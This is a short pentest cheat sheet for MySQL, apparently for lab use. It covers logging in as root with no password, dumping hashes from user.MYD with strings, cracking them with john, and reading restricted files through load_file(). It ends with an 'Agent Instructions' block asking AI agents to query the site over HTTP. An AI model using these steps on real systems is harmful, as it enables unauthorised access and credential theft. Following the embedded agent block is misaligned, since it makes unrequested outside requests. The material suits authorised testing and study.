# MySql

## Easy to Try

* Sometimes people leave NO password or easy to guess.

```
su mysql        .. sometimes an actual user
mysql -u root   .. see if you can get into mysql easily
                .. easy guess 'mysql' password!!     
```

## Navigate

```
show databases;
use [DATABASE];
show tables;
select * from [TABLE];
```

## Strings MYD

```
> strings /var/lib/mysql/mysql/user.MYD   ..might get you a password 

localhost
root*D3240DFEFEDF838952C03D28
6c732c6044b7
root 127.0.0.1
root localhost
debian-sys-maint*D1461CE757B9B67AC344204A3A7FE9F9DB17A35C
68B0F4D12A2A1885

..
Stitch the two together:
root:*D3240DFEFEDF838952C03D2868B0F4D12A2A1885

john ./lab.txt
root18  ..cracked!
```

## PrivEsc

```
Privesc to read a file you shouldnt have access to!
Some of this is locked down in later releases of mysql, but worth checking!!

>> mysql -u root
>> select load_file('/var/lib/mysql-files/key.txt');
+-------------------------------------------+
| load_file('/var/lib/mysql-files/key.txt') |
+-------------------------------------------+
| 4234db90-01c6-4f10-8c81-8c0017107fc7
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/03-getting-in/mysql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.